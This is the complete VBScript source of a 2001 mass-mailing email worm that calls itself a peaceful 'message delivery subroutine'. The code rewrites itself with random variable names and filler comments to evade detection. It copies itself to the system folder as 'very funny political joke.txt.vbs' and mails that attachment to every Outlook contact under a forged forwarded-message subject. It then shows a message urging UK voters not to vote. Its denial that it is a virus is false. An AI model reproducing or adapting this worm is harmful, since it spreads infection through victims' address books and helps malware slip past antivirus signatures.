rem this message delivery subroutine made peaceful by Eris,Belthane,2001
rem this is not a virus, it peacefully provides a message to the UK people.
rem let them make up their own mind
rem MVOVDEKIDAJYFWBVYSDXELVFQLKOIBVXEZZYHAMOTIXJ

dim XZAVLEXSKLHYPXIR, BCZATWEFAYQ, ZHYPFOUDN, EXVKQPJOFRZBAXNSY, XTOFNJGFSIYSF, HTADWFOV, MDNZRVCFCUDAPOVWSJGL, JFJNFPIGOXQQRDFNCTGYW, KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY, IPKIXHRRAL, XBGVHBMUDCYPGGFBXSDCSJBTXLIRYBPMYQPLIJNYCWKXOMVGQZIQ, OIWZVQEBGOPGZRNMIWAQCCTWYYPFCZDARLFLHP, HVABLIB, CHDXNZHJSQCLLI, JJUTZPRFNQCKWWJQYLPBFRUHGOFWFK, AUWAHCOGHVEKB(16,2)
On Error Resume Next
IPKIXHRRAL="Outlook."
IPKIXHRRAL=IPKIXHRRAL&"Application"
Set XBGVHBMUDCYPGGFBXSDCSJBTXLIRYBPMYQPLIJNYCWKXOMVGQZIQ = CreateObject("Scripting.FileSystemObject")
Set HTADWFOV = XBGVHBMUDCYPGGFBXSDCSJBTXLIRYBPMYQPLIJNYCWKXOMVGQZIQ.GetSpecialFolder(1)
set CHDXNZHJSQCLLI=WScript.CreateObject(IPKIXHRRAL)
set JJUTZPRFNQCKWWJQYLPBFRUHGOFWFK=CHDXNZHJSQCLLI.GetNameSpace("MAPI")
set OIWZVQEBGOPGZRNMIWAQCCTWYYPFCZDARLFLHP=XBGVHBMUDCYPGGFBXSDCSJBTXLIRYBPMYQPLIJNYCWKXOMVGQZIQ.OpenTextFile(WScript.ScriptFullname,1)
set HVABLIB=XBGVHBMUDCYPGGFBXSDCSJBTXLIRYBPMYQPLIJNYCWKXOMVGQZIQ.CreateTextFile(HTADWFOV&"/very funny political joke.txt.vbs")
set IPKIXHRRAL=CreateObject("WScript.Shell")

if isnull(IPKIXHRRAL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\Eris")) then
IPKIXHRRAL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&"Eris",1,"REG_DWORD"
Randomize
for i = 1 to 3
HVABLIB.writeline OIWZVQEBGOPGZRNMIWAQCCTWYYPFCZDARLFLHP.readline
next
Do While Not OIWZVQEBGOPGZRNMIWAQCCTWYYPFCZDARLFLHP.AtEndOfStream
rem HJYEQMUGWOHKRJFQMPKDIPNVYPEAON
with HVABLIB
IPKIXHRRAL=OIWZVQEBGOPGZRNMIWAQCCTWYYPFCZDARLFLHP.readline
if left(IPKIXHRRAL,3)="dim" then
JFJNFPIGOXQQRDFNCTGYW="dim "
KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY=4
rem WQKBIHDDOYORJDW
for MDNZRVCFCUDAPOVWSJGL=1 to 16
KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY=KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY+1
AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,1)=""
rem AKYMNNQNIGQOJZJOAWYLXHBSHKDUNQCUQGSQUQEWUAOCOYGITRQRARLSTIIBLCGWGIDGMRGWBKWKAEMBCKOADRAZQLOTGKIOEZKPXXCTLQVUZXGZJHZSPMZVHBCDEWQBQKTZFPZUD
do while not (mid(IPKIXHRRAL,KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY,2)=", " or mid(IPKIXHRRAL,KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY,1)="")
if not mid(IPKIXHRRAL,KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY,1)=" " then
AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,1)=AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,1)&mid(IPKIXHRRAL,KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY,1)
end if
KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY=KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY+1
loop
rem WGDFXLDXFXQHNUDQKPGVOQXUIPDAJZGCZORGSBEQSINEMH
AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,2)=""
for i=1 to 5
AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,2)=AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,2)&chr(Int(26*Rnd)+65)
next
do while not Int(20*Rnd)=0
AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,2)=AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,2)&chr(Int(26*Rnd)+65)
loop
if not MDNZRVCFCUDAPOVWSJGL=1 then
JFJNFPIGOXQQRDFNCTGYW=JFJNFPIGOXQQRDFNCTGYW&", "
end if
JFJNFPIGOXQQRDFNCTGYW=JFJNFPIGOXQQRDFNCTGYW&AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,2)
next
JFJNFPIGOXQQRDFNCTGYW=JFJNFPIGOXQQRDFNCTGYW&"(16,2)"
AUWAHCOGHVEKB(16,1)=left(AUWAHCOGHVEKB(16,1),len(AUWAHCOGHVEKB(16,1))-6)

rem STB
elseif left(IPKIXHRRAL,3)="rem" then
JFJNFPIGOXQQRDFNCTGYW="rem "
do while not Int(40*Rnd)=0
JFJNFPIGOXQQRDFNCTGYW=JFJNFPIGOXQQRDFNCTGYW&chr(Int(26*Rnd)+65)
loop

else
rem NSXLZTYXVALMCRIQUNSQIKNBBVSJW
KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY=1
MDNZRVCFCUDAPOVWSJGL=1
JFJNFPIGOXQQRDFNCTGYW=""

do while not mid(IPKIXHRRAL,KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY,1)=""
if mid(IPKIXHRRAL,KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY,len(AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,1)))=AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,1) then
JFJNFPIGOXQQRDFNCTGYW=JFJNFPIGOXQQRDFNCTGYW&AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,2)
KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY=KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY+len(AUWAHCOGHVEKB(MDNZRVCFCUDAPOVWSJGL,1))
else
MDNZRVCFCUDAPOVWSJGL=MDNZRVCFCUDAPOVWSJGL+1
if MDNZRVCFCUDAPOVWSJGL>16 then
JFJNFPIGOXQQRDFNCTGYW=JFJNFPIGOXQQRDFNCTGYW&mid(IPKIXHRRAL,KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY,1)
MDNZRVCFCUDAPOVWSJGL=1
KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY=KKURJENGESPVIIZBNJEHDIHFIFUJUFSPEZKPPHVHAMFPZBLRYYQLUIQHIUKIYCRAVQKRTSFY+1
end if
end if
loop
end if
.writeline JFJNFPIGOXQQRDFNCTGYW
end with
loop
HVABLIB.Copy(HTADWFOV&"\very funny political joke.txt.vbs")

for ZHYPFOUDN=1 to JJUTZPRFNQCKWWJQYLPBFRUHGOFWFK.AddressLists.Count
set BCZATWEFAYQ=JJUTZPRFNQCKWWJQYLPBFRUHGOFWFK.AddressLists(ZHYPFOUDN)
XZAVLEXSKLHYPXIR=1

for EXVKQPJOFRZBAXNSY=1 to BCZATWEFAYQ.AddressEntries.Count
XTOFNJGFSIYSF=BCZATWEFAYQ.AddressEntries(XZAVLEXSKLHYPXIR)
set male=CHDXNZHJSQCLLI.CreateItem(0)
male.Recipients.Add(XTOFNJGFSIYSF)
male.Subject = "FW: Something of interest to you"
male.Body = vbcrlf&"-----Original Message-----"&vbcrlf&"From: Eris [mailto:eris@yahoo.co.uk]"&vbcrlf&"Sent: "&date()&" "&left(time(),5)&vbcrlf&"To: MyFriendsList"&vbcrlf&"Subject: Something of interest to you"&vbcrlf&vbcrlf&vbcrlf
male.Attachments.Add(HTADWFOV&"\very funny political joke.txt.vbs")
male.Send
male=nothing
XZAVLEXSKLHYPXIR=XZAVLEXSKLHYPXIR+1
next
next
Set CHDXNZHJSQCLLI=Nothing
Set JJUTZPRFNQCKWWJQYLPBFRUHGOFWFK=Nothing
Set IPKIXHRRAL=Nothing
end if

IPKIXHRRAL=MsgBox("We vote Governments in; TRUSTING that THEY will deliver THEIR manifesto"&vbcrlf&"Why do THEY always break our TRUST?"&vbcrlf&"FCUK'EM!!!"&vbcrlf&"Vote NO Confidence"&vbcrlf&"DONT VOTE", 16, "UK Election Action")
